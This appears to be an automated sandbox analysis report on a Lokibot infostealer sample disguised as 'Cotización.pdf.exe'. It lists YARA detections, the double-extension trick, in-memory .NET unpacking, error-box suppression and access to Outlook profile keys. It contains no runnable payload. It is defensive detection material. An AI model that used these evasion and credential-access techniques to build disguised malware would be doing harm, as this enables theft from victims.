              .NET source code contains very large stringsShow sources
              Source: Cotizaci#U00f3n.pdf.exe, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 2.0.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 9.0.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 9.2.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.c20000.1.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Source: 12.0.Cotizaci#U00f3n.pdf.exe.c20000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
              Initial sample is a PE file and has a suspicious nameShow sources
              Source: initial sampleStatic PE information: Filename: Cotizaci#U00f3n.pdf.exe
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_0100C1342_2_0100C134
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_0100E5682_2_0100E568
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_0100E5782_2_0100E578
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C5F382_2_071C5F38
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C16E72_2_071C16E7
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C09202_2_071C0920
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C27382_2_071C2738
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C27282_2_071C2728
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C5F282_2_071C5F28
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3F902_2_071C3F90
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3F802_2_071C3F80
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C17BE2_2_071C17BE
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C561D2_2_071C561D
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C56302_2_071C5630
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C8D232_2_071C8D23
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C35602_2_071C3560
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3DB82_2_071C3DB8
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3DC82_2_071C3DC8
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C64182_2_071C6418
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C043B2_2_071C043B
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C04482_2_071C0448
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C94BC2_2_071C94BC
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C94FC2_2_071C94FC
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C7B732_2_071C7B73
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3B882_2_071C3B88
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C7B802_2_071C7B80
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C3B832_2_071C3B83
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C32582_2_071C3258
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C32682_2_071C3268
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C92D02_2_071C92D0
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C92C02_2_071C92C0
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C39182_2_071C3918
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C69102_2_071C6910
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C09102_2_071C0910
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C39092_2_071C3909
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 2_2_071C69002_2_071C6900
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040549C12_2_0040549C
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_004029D412_2_004029D4
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: String function: 00405B6F appears 42 times
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.297991546.00000000074C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000000.196617328.00000000008AF000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.289124897.0000000003023000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResource_Meter.dll> vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.297202205.00000000070E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000009.00000000.283640201.000000000028F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.461566334.0000000000D2F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exeBinary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@137/3
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,12_2_0040650A
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,12_2_0040434D
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.logJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Cotizaci#U00f3n.pdf.exeStatic file information: File size 1104896 > 1048576
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              barindex
              .NET source code contains potential unpackerShow sources
              Source: Cotizaci#U00f3n.pdf.exe, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.0.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 9.0.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 9.2.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.c20000.1.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 12.0.Cotizaci#U00f3n.pdf.exe.c20000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Yara detected aPLib compressed binaryShow sources
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 2644, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AD4
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AFC
              Source: initial sampleStatic PE information: section name: .text entropy: 7.67256143073

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)Show sources
              Source: Possible double extension: pdf.exeStatic PE information: Cotizaci#U00f3n.pdf.exe
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
